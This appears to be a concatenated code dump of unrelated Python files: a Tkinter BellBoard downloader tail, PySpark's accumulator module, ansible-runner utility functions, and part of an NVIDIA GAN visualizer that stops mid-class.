                        print("   {}".format(saveName+'.csv'))
                        url_andSaveName.append(url+"&fmt="+"csv")
                        if saveName[-1] == os.sep:
                            print('   Warning, filename not given, using "bellBoardDefault" instead!')
                            url_andSaveName.append(saveName+"bellBoardDefault"+".csv")
                        else:
                            url_andSaveName.append(saveName+".csv")
                        download_q.put(url_andSaveName)
                        url_andSaveName = []
                        numberOfFilesToDownload += 1
                url = "{}".format(self.urlBefore)
            print("Total number of files to download: {}".format(numberOfFilesToDownload))
            # Create pool of threads
            pool = [DownloadWorkerThread(download_q=download_q) for _ in range(numberOfFilesToDownload)]
            print("########################\n --- Download Started ---\n ########################")
            # Start all threads
            for thread in pool:
                thread.start()
            # Ask threads to die and wait for them to do it
            for thread in pool:
                thread.join()
            print("#########################\n --- Download Complete ---\n #########################")
            self.options.updateState("normal")
            self.advancedOptions.updateState("normal")
            self.downloadOptions.updateState("normal")
# Script entry point: build the Tk root window and hand it to the BB app.
if __name__ == "__main__":
    # NOTE(review): `tk` must come from an `import tkinter as tk` at the top
    # of this file -- confirm, since the import section is not visible here.
    root=tk.Tk()
    BB(root).pack(side="top", fill="both", expand=True)
    root.mainloop()
|
accumulators.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
>>> from pyspark.context import SparkContext
>>> sc = SparkContext('local', 'test')
>>> a = sc.accumulator(1)
>>> a.value
1
>>> a.value = 2
>>> a.value
2
>>> a += 5
>>> a.value
7
>>> sc.accumulator(1.0).value
1.0
>>> sc.accumulator(1j).value
1j
>>> rdd = sc.parallelize([1,2,3])
>>> def f(x):
... global a
... a += x
>>> rdd.foreach(f)
>>> a.value
13
>>> b = sc.accumulator(0)
>>> def g(x):
... b.add(x)
>>> rdd.foreach(g)
>>> b.value
6
>>> from pyspark.accumulators import AccumulatorParam
>>> class VectorAccumulatorParam(AccumulatorParam):
... def zero(self, value):
... return [0.0] * len(value)
... def addInPlace(self, val1, val2):
... for i in xrange(len(val1)):
... val1[i] += val2[i]
... return val1
>>> va = sc.accumulator([1.0, 2.0, 3.0], VectorAccumulatorParam())
>>> va.value
[1.0, 2.0, 3.0]
>>> def g(x):
... global va
... va += [x] * 3
>>> rdd.foreach(g)
>>> va.value
[7.0, 8.0, 9.0]
>>> rdd.map(lambda x: a.value).collect() # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Py4JJavaError:...
>>> def h(x):
... global a
... a.value = 7
>>> rdd.foreach(h) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Py4JJavaError:...
>>> sc.accumulator([1.0, 2.0, 3.0]) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Exception:...
"""
import select
import struct
import SocketServer
import threading
from pyspark.cloudpickle import CloudPickler
from pyspark.serializers import read_int, PickleSerializer
__all__ = ['Accumulator', 'AccumulatorParam']
pickleSer = PickleSerializer()
# Holds accumulators registered on the current machine, keyed by ID. This is then used to send
# the local accumulator updates back to the driver program at the end of a task.
_accumulatorRegistry = {}
def _deserialize_accumulator(aid, zero_value, accum_param):
    """Recreate an Accumulator on a worker and register it locally.

    Unpickling hook used by Accumulator.__reduce__: the rebuilt copy starts
    from the zero value and is flagged as deserialized so that .value access
    raises inside tasks.
    """
    from pyspark.accumulators import _accumulatorRegistry
    worker_copy = Accumulator(aid, zero_value, accum_param)
    worker_copy._deserialized = True
    _accumulatorRegistry[aid] = worker_copy
    return worker_copy
class Accumulator(object):
    """
    A shared variable that can be accumulated, i.e., has a commutative and associative "add"
    operation. Worker tasks on a Spark cluster can add values to an Accumulator with the C{+=}
    operator, but only the driver program is allowed to access its value, using C{value}.
    Updates from the workers get propagated automatically to the driver program.

    While C{SparkContext} supports accumulators for primitive data types like C{int} and
    C{float}, users can also define accumulators for custom types by providing a custom
    L{AccumulatorParam} object. Refer to the doctest of this module for an example.
    """

    def __init__(self, aid, value, accum_param):
        """Create a new Accumulator with a given initial value and AccumulatorParam object"""
        from pyspark.accumulators import _accumulatorRegistry
        self.aid = aid                  # accumulator id assigned by the SparkContext
        self.accum_param = accum_param  # strategy defining zero() and addInPlace()
        self._value = value
        self._deserialized = False      # True only on worker-side (unpickled) copies
        _accumulatorRegistry[aid] = self

    def __reduce__(self):
        """Custom serialization; saves the zero value from our AccumulatorParam"""
        zeroed = self.accum_param.zero(self._value)
        return _deserialize_accumulator, (self.aid, zeroed, self.accum_param)

    @property
    def value(self):
        """Get the accumulator's value; only usable in driver program"""
        if self._deserialized:
            raise Exception("Accumulator.value cannot be accessed inside tasks")
        return self._value

    @value.setter
    def value(self, value):
        """Sets the accumulator's value; only usable in driver program"""
        if self._deserialized:
            raise Exception("Accumulator.value cannot be accessed inside tasks")
        self._value = value

    def add(self, term):
        """Adds a term to this accumulator's value"""
        self._value = self.accum_param.addInPlace(self._value, term)

    def __iadd__(self, term):
        """The += operator; adds a term to this accumulator's value"""
        self.add(term)
        return self

    def __str__(self):
        return str(self._value)

    def __repr__(self):
        return "Accumulator<id={:d}, value={}>".format(self.aid, self._value)
class AccumulatorParam(object):
    """
    Helper object that defines how to accumulate values of a given type.

    Subclasses must implement both zero() and addInPlace().
    """

    def zero(self, value):
        """
        Provide a "zero value" for the type, compatible in dimensions with the
        provided C{value} (e.g., a zero vector)
        """
        raise NotImplementedError

    def addInPlace(self, value1, value2):
        """
        Add two values of the accumulator's data type, returning a new value;
        for efficiency, can also update C{value1} in place and return it.
        """
        raise NotImplementedError
class AddingAccumulatorParam(AccumulatorParam):
"""
An AccumulatorParam that uses the + operators to add values. Designed for simple types
such as integers, floats, and lists. Requires the zero value for the underlying type
as a parameter.
"""
def __init__(self, zero_value):
self.zero_value = zero_value
def zero(self, value):
return self.zero_value
def addInPlace(self, value1, value2):
value1 += value2
return value1
# Singleton accumulator params for some standard types
INT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0)  # used for int accumulators
FLOAT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0)  # used for float accumulators
COMPLEX_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0j)  # used for complex accumulators
class _UpdateRequestHandler(SocketServer.StreamRequestHandler):
    """
    This handler will keep polling updates from the same socket until the
    server is shutdown.
    """

    def handle(self):
        from pyspark.accumulators import _accumulatorRegistry
        # Loop until AccumulatorServer.shutdown() flips the flag.
        while not self.server.server_shutdown:
            # Poll every 1 second for new data -- don't block in case of shutdown.
            readable, _, _ = select.select([self.rfile], [], [], 1)
            if self.rfile not in readable:
                continue
            num_updates = read_int(self.rfile)
            for _ in range(num_updates):
                aid, update = pickleSer._read_with_length(self.rfile)
                _accumulatorRegistry[aid] += update
            # Write a byte in acknowledgement
            self.wfile.write(struct.pack("!b", 1))
class AccumulatorServer(SocketServer.TCPServer):
    """
    A simple TCP server that intercepts shutdown() in order to interrupt
    our continuous polling on the handler.
    """

    # Flag polled by _UpdateRequestHandler.handle() so it can exit cleanly.
    server_shutdown = False

    def shutdown(self):
        """Tell the handler loop to stop, then do the normal TCPServer shutdown."""
        self.server_shutdown = True
        super(AccumulatorServer, self).shutdown()
def _start_update_server():
    """Start a TCP server to receive accumulator updates in a daemon thread, and returns it"""
    server = AccumulatorServer(("localhost", 0), _UpdateRequestHandler)
    serving_thread = threading.Thread(target=server.serve_forever)
    serving_thread.daemon = True  # don't keep the interpreter alive on exit
    serving_thread.start()
    return server
|
__init__.py |
import json
import sys
import re
import os
import stat
import fcntl
import shutil
import hashlib
import tempfile
import subprocess
import base64
import threading
import pipes
import uuid
import codecs
import atexit
import signal
from distutils.spawn import find_executable
from ansible_runner.exceptions import ConfigurationError
try:
from collections.abc import Iterable, MutableMapping
except ImportError:
from collections import Iterable, MutableMapping
from io import StringIO
from six import string_types, PY2, PY3, text_type, binary_type
def cleanup_folder(folder):
    """Delete *folder* recursively.

    Returns True when the tree was removed, False when there was nothing to
    remove (missing path or not a directory).
    """
    try:
        shutil.rmtree(folder)
    except (FileNotFoundError, NotADirectoryError):
        return False
    return True
def register_for_cleanup(folder):
    '''
    Provide the path to a folder to make sure it is deleted when execution finishes.
    The folder need not exist at the time when this is called.
    '''
    # cleanup_folder tolerates a missing path, so registration is always safe.
    atexit.register(cleanup_folder, folder)
class Bunch(object):
    '''
    Collect a bunch of variables together in an object.
    This is a slight modification of Alex Martelli's and Doug Hudgeon's Bunch pattern.
    '''

    def __init__(self, **kwargs):
        '''Seed the bunch with the given keyword attributes.'''
        self.update(**kwargs)

    def update(self, **kwargs):
        '''Merge the keyword arguments into this object's attributes.'''
        self.__dict__.update(kwargs)

    def get(self, key):
        '''Return the attribute named *key*, or None when absent.'''
        return self.__dict__.get(key)
def isplaybook(obj):
    '''
    Inspects the object and returns if it is a playbook

    Args:
        obj (object): The object to be inspected by this function

    Returns:
        boolean: True if the object is a list and False if it is not
    '''
    from collections.abc import Iterable, MutableMapping
    # A playbook is any iterable that is neither a string nor a mapping,
    # i.e. typically a list of plays. (six.string_types replaced with str:
    # this file already requires Python 3 -- it uses f-strings.)
    return isinstance(obj, Iterable) and not isinstance(obj, (str, MutableMapping))
def isinventory(obj):
    '''
    Inspects the object and returns if it is an inventory

    Args:
        obj (object): The object to be inspected by this function

    Returns:
        boolean: True if the object is an inventory dict and False if it is not
    '''
    from collections.abc import MutableMapping
    # An inventory is either a mapping of hosts or a path/content string.
    # (six.string_types replaced with str: this file is Python 3 only.)
    return isinstance(obj, (MutableMapping, str))
def check_isolation_executable_installed(isolation_executable):
    '''
    Check that process isolation executable (e.g. podman, docker, bwrap) is installed.
    '''
    try:
        proc = subprocess.Popen([isolation_executable, '--version'],
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)
        proc.communicate()
    except (OSError, ValueError) as exc:
        # errno 2 (ENOENT) just means "not installed"; anything else is
        # unexpected and surfaced as a RuntimeError.
        if isinstance(exc, ValueError) or getattr(exc, 'errno', 1) != 2:
            raise RuntimeError(f'{isolation_executable} unavailable for unexpected reason.')
        return False
    return proc.returncode == 0
def dump_artifact(obj, path, filename=None):
    '''
    Write the artifact to disk at the specified path

    Args:
        obj (string): The string object to be dumped to disk in the specified
            path.  The artifact filename will be automatically created
        path (string): The full path to the artifacts data directory.
        filename (string, optional): The name of file to write the artifact to.
            If the filename is not provided, then one will be generated.

    Returns:
        string: The full path filename for the artifact that was generated
    '''
    if not os.path.exists(path):
        os.makedirs(path, mode=0o700)

    # Hash of the payload, used to skip rewriting an identical existing file.
    # Computed unconditionally: the original only computed it when `path`
    # already existed, which crashed with AttributeError when filename was
    # None and mkstemp created a file inside a freshly made directory.
    p_sha1 = hashlib.sha1()
    p_sha1.update(obj.encode(encoding='UTF-8'))

    if filename is None:
        fd, fn = tempfile.mkstemp(dir=path)
        os.close(fd)  # BUGFIX: mkstemp's file descriptor was previously leaked
    else:
        fn = os.path.join(path, filename)

    if os.path.exists(fn):
        c_sha1 = hashlib.sha1()
        with open(fn, encoding='UTF-8') as f:
            contents = f.read()
        c_sha1.update(contents.encode(encoding='UTF-8'))

    if not os.path.exists(fn) or p_sha1.hexdigest() != c_sha1.hexdigest():
        # Serialize concurrent writers with an exclusive lock file.
        lock_fp = os.path.join(path, '.artifact_write_lock')
        lock_fd = os.open(lock_fp, os.O_RDWR | os.O_CREAT, stat.S_IRUSR | stat.S_IWUSR)
        fcntl.lockf(lock_fd, fcntl.LOCK_EX)
        try:
            with open(fn, 'w') as f:
                # NOTE(review): the artifact is made read-only here, so a
                # later dump of *different* content to the same filename will
                # raise PermissionError (pre-existing behaviour).
                os.chmod(fn, stat.S_IRUSR)
                f.write(str(obj))
        finally:
            fcntl.lockf(lock_fd, fcntl.LOCK_UN)
            os.close(lock_fd)
            os.remove(lock_fp)
    return fn
def cleanup_artifact_dir(path, num_keep=0):
    """Rotate artifact directories under *path*, keeping the *num_keep* newest.

    A num_keep of 0 (the default) disables cleanup/rotation entirely.
    """
    if num_keep < 1:
        return
    # Oldest first, by modification time.
    entries = sorted((os.path.join(path, name) for name in os.listdir(path)),
                     key=os.path.getmtime)
    excess = len(entries) - num_keep
    for stale in entries[:max(excess, 0)]:
        shutil.rmtree(stale)
def dump_artifacts(kwargs):
    '''
    Introspect the kwargs and dump objects to disk

    Mutates *kwargs* in place: role/playbook/inventory/env inputs that were
    passed as Python objects are serialized into the private data dir and
    replaced (or popped) so the runner configuration can read them from disk.
    '''
    # Guarantee a private data dir exists; create a temp one if not given.
    private_data_dir = kwargs.get('private_data_dir')
    if not private_data_dir:
        private_data_dir = tempfile.mkdtemp()
        kwargs['private_data_dir'] = private_data_dir
    if not os.path.exists(private_data_dir):
        raise ValueError('private_data_dir path is either invalid or does not exist')
    if 'role' in kwargs:
        # Wrap a bare role into a one-play playbook.
        role = {'name': kwargs.pop('role')}
        if 'role_vars' in kwargs:
            role['vars'] = kwargs.pop('role_vars')
        play = [{'hosts': kwargs.pop('hosts', 'all'), 'roles': [role]}]
        if kwargs.pop('role_skip_facts', False):
            play[0]['gather_facts'] = False
        kwargs['playbook'] = play
        if 'envvars' not in kwargs:
            kwargs['envvars'] = {}
        # Make the role resolvable: prepend/append the project roles dir.
        roles_path = kwargs.pop('roles_path', None)
        if not roles_path:
            roles_path = os.path.join(private_data_dir, 'roles')
        else:
            roles_path += ':{}'.format(os.path.join(private_data_dir, 'roles'))
        kwargs['envvars']['ANSIBLE_ROLES_PATH'] = roles_path
    playbook = kwargs.get('playbook')
    if playbook:
        # Ensure the play is a list of dictionaries
        if isinstance(playbook, MutableMapping):
            playbook = [playbook]
        if isplaybook(playbook):
            # Serialize the in-memory playbook and point kwargs at the file.
            path = os.path.join(private_data_dir, 'project')
            kwargs['playbook'] = dump_artifact(json.dumps(playbook), path, 'main.json')
    obj = kwargs.get('inventory')
    if obj and isinventory(obj):
        path = os.path.join(private_data_dir, 'inventory')
        if isinstance(obj, MutableMapping):
            # Dict inventory -> hosts.json file.
            kwargs['inventory'] = dump_artifact(json.dumps(obj), path, 'hosts.json')
        elif isinstance(obj, string_types):
            # A string that is not an existing path is treated as inventory
            # content and written out; existing paths are left untouched.
            if not os.path.exists(obj):
                kwargs['inventory'] = dump_artifact(obj, path, 'hosts')
    # JSON-serializable env inputs: dump once, then drop from kwargs.
    for key in ('envvars', 'extravars', 'passwords', 'settings'):
        obj = kwargs.get(key)
        if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
            path = os.path.join(private_data_dir, 'env')
            dump_artifact(json.dumps(obj), path, key)
            kwargs.pop(key)
    # Plain-string env inputs.
    for key in ('ssh_key', 'cmdline'):
        obj = kwargs.get(key)
        if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
            path = os.path.join(private_data_dir, 'env')
            dump_artifact(str(kwargs[key]), path, key)
            kwargs.pop(key)
def collect_new_events(event_path, old_events):
    '''
    Collect new events for the 'events' generator property

    Yields (event, old_events) tuples for each completed, not-yet-seen
    "<counter>-<id>.json" file under *event_path*, in counter order, marking
    each file as seen in *old_events*.
    '''
    fresh_files = []
    for name in os.listdir(event_path):
        # Completed events look like "<number>-<something>.json"; skip
        # partial files and ones we've already yielded.
        if not re.match("^[0-9]+-.+json$", name):
            continue
        if '-partial' in name or name in old_events.keys():
            continue
        fresh_files.append(name)
    # Replay in the order the events were emitted (numeric prefix).
    fresh_files.sort(key=lambda name: int(name.split("-", 1)[0]))
    for event_file in fresh_files:
        with codecs.open(os.path.join(event_path, event_file), 'r', encoding='utf-8') as handle:
            try:
                event = json.load(handle)
            except ValueError:
                # File not fully written yet; give up until the next call.
                break
        old_events[event_file] = True
        yield event, old_events
class OutputEventFilter(object):
    '''
    File-like object that looks for encoded job events in stdout data.

    Event payloads arrive base64-encoded between \\x1b[K escape tokens;
    write() strips them out, fires event_callback per decoded event, and
    forwards the human-visible stdout to the wrapped handle.
    '''

    # One encoded event: start token, base64 payload split into chunks each
    # followed by a cursor-move escape, then the end token.
    EVENT_DATA_RE = re.compile(r'\x1b\[K((?:[A-Za-z0-9+/=]+\x1b\[\d+D)+)\x1b\[K')

    def __init__(self, handle, event_callback,
                 suppress_ansible_output=False, output_json=False):
        # handle: file-like sink for the filtered stdout text.
        # event_callback: called once per decoded/verbose event dict.
        self._event_callback = event_callback
        self._counter = 0               # monotonically increasing event counter
        self._start_line = 0            # running stdout line offset
        self._handle = handle
        self._buffer = StringIO()       # accumulates raw data between events
        self._last_chunk = ''
        self._current_event_data = None  # event dict awaiting its stdout body
        self.output_json = output_json
        self.suppress_ansible_output = suppress_ansible_output

    def flush(self):
        """Flush the underlying handle."""
        self._handle.flush()

    def write(self, data):
        """Buffer *data*, extracting and emitting any complete encoded events."""
        self._buffer.write(data)

        # keep a sliding window of the last chunk written so we can detect
        # event tokens and determine if we need to perform a search of the full
        # buffer
        should_search = '\x1b[K' in (self._last_chunk + data)
        self._last_chunk = data

        # Only bother searching the buffer if we recently saw a start/end
        # token (\x1b[K)
        while should_search:
            value = self._buffer.getvalue()
            match = self.EVENT_DATA_RE.search(value)
            if not match:
                break
            try:
                base64_data = re.sub(r'\x1b\[\d+D', '', match.group(1))
                event_data = json.loads(base64.b64decode(base64_data).decode('utf-8'))
            except ValueError:
                # Undecodable payload: emit with empty event data.
                event_data = {}
            # Everything before the match is the stdout belonging to the
            # previous event.
            event_data = self._emit_event(value[:match.start()], event_data)
            if not self.output_json:
                stdout_actual = event_data['stdout'] if 'stdout' in event_data else None
            else:
                stdout_actual = json.dumps(event_data)
            remainder = value[match.end():]
            self._buffer = StringIO()
            self._buffer.write(remainder)
            if stdout_actual and stdout_actual != "{}":
                if not self.suppress_ansible_output:
                    sys.stdout.write(
                        stdout_actual.encode('utf-8') if PY2 else stdout_actual
                    )
                    sys.stdout.write("\n")
                    sys.stdout.flush()
                self._handle.write(stdout_actual + "\n")
                self._handle.flush()
            self._last_chunk = remainder
        # while/else: this branch runs only when the loop exits WITHOUT the
        # break above -- i.e. when no event token was seen at all.
        else:
            # Verbose stdout outside of event data context
            if data and '\n' in data and self._current_event_data is None:
                # emit events for all complete lines we know about
                lines = self._buffer.getvalue().splitlines(True)  # keep ends
                remainder = None
                # if last line is not a complete line, then exclude it
                if '\n' not in lines[-1]:
                    remainder = lines.pop()
                # emit all complete lines
                for line in lines:
                    self._emit_event(line)
                    if not self.suppress_ansible_output:
                        sys.stdout.write(
                            line.encode('utf-8') if PY2 else line
                        )
                    self._handle.write(line)
                    self._handle.flush()
                self._buffer = StringIO()
                # put final partial line back on buffer
                if remainder:
                    self._buffer.write(remainder)

    def close(self):
        """Flush any buffered text as a final event and emit the EOF marker."""
        value = self._buffer.getvalue()
        if value:
            self._emit_event(value)
            self._buffer = StringIO()
        self._event_callback(dict(event='EOF'))
        self._handle.close()

    def _emit_event(self, buffered_stdout, next_event_data=None):
        """Attach *buffered_stdout* to the pending event (or synthesize a
        'verbose' event per line) and invoke the callback; returns the last
        event dict emitted."""
        next_event_data = next_event_data or {}
        if self._current_event_data:
            # stdout belongs to the event whose header we saw previously.
            event_data = self._current_event_data
            stdout_chunks = [buffered_stdout]
        elif buffered_stdout:
            # No pending event: each line becomes its own 'verbose' event.
            event_data = dict(event='verbose')
            stdout_chunks = buffered_stdout.splitlines(True)
        else:
            event_data = dict()
            stdout_chunks = []

        for stdout_chunk in stdout_chunks:
            if event_data.get('event') == 'verbose':
                event_data['uuid'] = str(uuid.uuid4())
            self._counter += 1
            event_data['counter'] = self._counter
            # Strip the trailing line ending from the recorded stdout.
            event_data['stdout'] = stdout_chunk[:-2] if len(stdout_chunk) > 2 else ""
            n_lines = stdout_chunk.count('\n')
            event_data['start_line'] = self._start_line
            event_data['end_line'] = self._start_line + n_lines
            self._start_line += n_lines
            if self._event_callback:
                self._event_callback(event_data)

        # A payload with a uuid is a real event header: hold it until its
        # stdout body arrives with the next token.
        if next_event_data.get('uuid', None):
            self._current_event_data = next_event_data
        else:
            self._current_event_data = None
        return event_data
def open_fifo_write(path, data):
    '''Create the fifo named pipe at *path* and write *data* to it from a helper thread.

    Opening a fifo for writing blocks until an external reader (such as
    ssh-agent) connects, so the write runs on its own thread to avoid
    blocking the caller.
    '''
    os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)

    def _writer(pipe_path, payload):
        open(pipe_path, 'wb').write(payload)

    threading.Thread(target=_writer, args=(path, data)).start()
def args2cmdline(*args):
    """Join *args* into a single shell-safe command line string."""
    # shlex.quote is the documented replacement for pipes.quote; the pipes
    # module was deprecated and removed in Python 3.13.
    import shlex
    return ' '.join(shlex.quote(a) for a in args)
def ensure_str(s, encoding='utf-8', errors='strict'):
    """
    Coerce *s* to `str` (originally copied from six==1.12, now simplified
    for Python 3, which this file already requires -- it uses f-strings).

    - `str`   -> returned unchanged
    - `bytes` -> decoded to `str` with *encoding*/*errors*

    Raises:
        TypeError: when *s* is neither str nor bytes.
    """
    if not isinstance(s, (str, bytes)):
        raise TypeError("not expecting type '%s'" % type(s))
    if isinstance(s, bytes):
        s = s.decode(encoding, errors)
    return s
def sanitize_container_name(original_name):
    """
    Docker and podman will only accept certain characters in container names
    This takes a given name from user-specified values and replaces the
    invalid characters so it can be used in docker/podman CLI commands
    """
    # str() replaces six.text_type -- this file is Python 3 only (f-strings).
    return re.sub('[^a-zA-Z0-9_-]', '_', str(original_name))
def cli_mounts():
    """Return the env-var / path mount spec used to wire SSH agent access
    into a container (both the rootless and root home locations)."""
    home = os.environ['HOME']
    ssh_paths = [
        {'src': '{}/.ssh/'.format(home), 'dest': '/home/runner/.ssh/'},
        {'src': '{}/.ssh/'.format(home), 'dest': '/root/.ssh/'},
        {'src': '/etc/ssh/ssh_known_hosts', 'dest': '/etc/ssh/ssh_known_hosts'},
    ]
    return [{'ENVS': ['SSH_AUTH_SOCK'], 'PATHS': ssh_paths}]
def santize_json_response(data):
    '''
    Removes warning message from response message emitted by ansible
    command line utilities.

    :param data: The string data to be sanitized
    :type data: str
    '''
    # Everything from the first '{' to the end of the string is the JSON
    # payload; anything before it is banner/warning text we discard.
    # re.DOTALL makes '.' span newlines, matching the original
    # '(.|\n)*' pattern exactly.
    payload_re = re.compile(r"{.*", re.DOTALL)
    return payload_re.search(data).group().strip()
def get_executable_path(name):
    """Resolve *name* to an executable on PATH.

    Raises ConfigurationError when the command cannot be found.
    """
    path = find_executable(name)
    if path is not None:
        return path
    raise ConfigurationError(f"{name} command not found")
def signal_handler():
    """Install SIGTERM/SIGINT handlers that record receipt in an Event.

    Returns the event's ``is_set`` callable so callers can poll whether a
    termination signal arrived, or None when invoked from a non-main thread
    (only the main thread may install signal handlers).
    """
    if threading.current_thread() is not threading.main_thread():
        # Only the main thread is allowed to set a new signal handler.
        return None

    signal_event = threading.Event()

    def _handler(number, frame):
        # Closure: flip the shared event on either signal.
        signal_event.set()

    for signum in (signal.SIGTERM, signal.SIGINT):
        signal.signal(signum, _handler)
    return signal_event.is_set
|
visualizer.py | # Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# NVIDIA CORPORATION and its licensors retain all intellectual property
# and proprietary rights in and to this software, related documentation
# and any modifications thereto. Any use, reproduction, disclosure or
# distribution of this software and related documentation without an express
# license agreement from NVIDIA CORPORATION is strictly prohibited.
import click
import os
import multiprocessing
import numpy as np
import imgui
import dnnlib
from gui_utils import imgui_window
from gui_utils import imgui_utils
from gui_utils import gl_utils
from gui_utils import text_utils
from viz import renderer
from viz import pickle_widget
from viz import latent_widget
from viz import stylemix_widget
from viz import trunc_noise_widget
from viz import performance_widget
from viz import capture_widget
from viz import layer_widget
from viz import equivariance_widget
#----------------------------------------------------------------------------
class Visualizer(imgui_window.ImguiWindow):
    """Main application window for interactively exploring a GAN.

    A control pane on the left hosts the widgets; the remaining area shows
    the image produced by the (possibly asynchronous) renderer.
    """

    def __init__(self, capture_dir=None):
        super().__init__(title='GAN Visualizer', window_width=3840, window_height=2160)

        # Internals.
        self._last_error_print = None   # last error text printed (dedup consecutive repeats)
        self._async_renderer = AsyncRenderer()
        self._defer_rendering = 0       # frames left to skip before rendering again
        self._tex_img = None            # image object currently uploaded as a GL texture
        self._tex_obj = None            # gl_utils.Texture wrapping _tex_img

        # Widget interface.
        self.args = dnnlib.EasyDict()   # render arguments gathered from widgets each frame
        self.result = dnnlib.EasyDict() # most recent render result
        self.pane_w = 0                 # control-pane width in pixels (recomputed per frame)
        self.label_w = 0
        self.button_w = 0

        # Widgets.
        self.pickle_widget = pickle_widget.PickleWidget(self)
        self.latent_widget = latent_widget.LatentWidget(self)
        self.stylemix_widget = stylemix_widget.StyleMixingWidget(self)
        self.trunc_noise_widget = trunc_noise_widget.TruncationNoiseWidget(self)
        self.perf_widget = performance_widget.PerformanceWidget(self)
        self.capture_widget = capture_widget.CaptureWidget(self)
        self.layer_widget = layer_widget.LayerWidget(self)
        self.eq_widget = equivariance_widget.EquivarianceWidget(self)
        if capture_dir is not None:
            self.capture_widget.path = capture_dir

        # Initialize window.
        self.set_position(0, 0)
        self._adjust_font_size()
        self.skip_frame()  # Layout may change after first frame.

    def close(self):
        """Close the window and shut down the renderer (and its subprocess)."""
        super().close()
        if self._async_renderer is not None:
            self._async_renderer.close()
            self._async_renderer = None

    def add_recent_pickle(self, pkl, ignore_errors=False):
        # Add a pickle to the "recent" list without loading it.
        self.pickle_widget.add_recent(pkl, ignore_errors=ignore_errors)

    def load_pickle(self, pkl, ignore_errors=False):
        # Load a network pickle immediately.
        self.pickle_widget.load(pkl, ignore_errors=ignore_errors)

    def print_error(self, error):
        # Print an error to stdout, suppressing consecutive duplicates.
        error = str(error)
        if error != self._last_error_print:
            print('\n' + error + '\n')
            self._last_error_print = error

    def defer_rendering(self, num_frames=1):
        # Skip rendering for at least `num_frames` upcoming frames.
        self._defer_rendering = max(self._defer_rendering, num_frames)

    def clear_result(self):
        self._async_renderer.clear_result()

    def set_async(self, is_async):
        # Toggle between in-process and subprocess rendering.
        if is_async != self._async_renderer.is_async:
            self._async_renderer.set_async(is_async)
            self.clear_result()
            if 'image' in self.result:
                self.result.message = 'Switching rendering process...'
                self.defer_rendering()

    def _adjust_font_size(self):
        # Scale the UI font with the window size.
        old = self.font_size
        self.set_font_size(min(self.content_width / 120, self.content_height / 60))
        if self.font_size != old:
            self.skip_frame()  # Layout changed.

    def draw_frame(self):
        """Run one GUI frame: collect widget args, kick off rendering, and
        display the latest result (or error/message) in the result area."""
        self.begin_frame()
        self.args = dnnlib.EasyDict()
        self.pane_w = self.font_size * 45
        self.button_w = self.font_size * 5
        self.label_w = round(self.font_size * 4.5)

        # Detect mouse dragging in the result area.
        dragging, dx, dy = imgui_utils.drag_hidden_window('##result_area', x=self.pane_w, y=0, width=self.content_width-self.pane_w, height=self.content_height)
        if dragging:
            self.latent_widget.drag(dx, dy)

        # Begin control pane.
        imgui.set_next_window_position(0, 0)
        imgui.set_next_window_size(self.pane_w, self.content_height)
        imgui.begin('##control_pane', closable=False, flags=(imgui.WINDOW_NO_TITLE_BAR | imgui.WINDOW_NO_RESIZE | imgui.WINDOW_NO_MOVE))

        # Widgets. Each call both draws the widget and contributes to self.args.
        expanded, _visible = imgui_utils.collapsing_header('Network & latent', default=True)
        self.pickle_widget(expanded)
        self.latent_widget(expanded)
        self.stylemix_widget(expanded)
        self.trunc_noise_widget(expanded)
        expanded, _visible = imgui_utils.collapsing_header('Performance & capture', default=True)
        self.perf_widget(expanded)
        self.capture_widget(expanded)
        expanded, _visible = imgui_utils.collapsing_header('Layers & channels', default=True)
        self.layer_widget(expanded)
        # Equivariance controls only make sense when the network exposes an
        # input transform; gray them out otherwise.
        with imgui_utils.grayed_out(not self.result.get('has_input_transform', False)):
            expanded, _visible = imgui_utils.collapsing_header('Equivariance', default=True)
            self.eq_widget(expanded)

        # Render.
        if self.is_skipping_frames():
            pass
        elif self._defer_rendering > 0:
            self._defer_rendering -= 1
        elif self.args.pkl is not None:
            self._async_renderer.set_args(**self.args)
            result = self._async_renderer.get_result()
            if result is not None:
                self.result = result

        # Display.
        max_w = self.content_width - self.pane_w
        max_h = self.content_height
        pos = np.array([self.pane_w + max_w / 2, max_h / 2])
        if 'image' in self.result:
            # Re-upload the texture only when the image object changed.
            if self._tex_img is not self.result.image:
                self._tex_img = self.result.image
                if self._tex_obj is None or not self._tex_obj.is_compatible(image=self._tex_img):
                    self._tex_obj = gl_utils.Texture(image=self._tex_img, bilinear=False, mipmap=False)
                else:
                    self._tex_obj.update(self._tex_img)
            # Snap zoom factors >= 1 to integers so upscaled pixels stay crisp.
            zoom = min(max_w / self._tex_obj.width, max_h / self._tex_obj.height)
            zoom = np.floor(zoom) if zoom >= 1 else zoom
            self._tex_obj.draw(pos=pos, zoom=zoom, align=0.5, rint=True)
        if 'error' in self.result:
            self.print_error(self.result.error)
            if 'message' not in self.result:
                self.result.message = str(self.result.error)
        if 'message' in self.result:
            tex = text_utils.get_texture(self.result.message, size=self.font_size, max_width=max_w, max_height=max_h, outline=2)
            tex.draw(pos=pos, align=0.5, rint=True, color=1)

        # End frame.
        self._adjust_font_size()
        imgui.end()
        self.end_frame()
#----------------------------------------------------------------------------
class AsyncRenderer:
    """Dispatches render requests either synchronously (in-process) or
    asynchronously (to a spawned worker process), keeping only the most
    recent result."""

    def __init__(self):
        self._closed = False
        self._is_async = False
        self._cur_args = None       # last args submitted; used to dedup identical requests
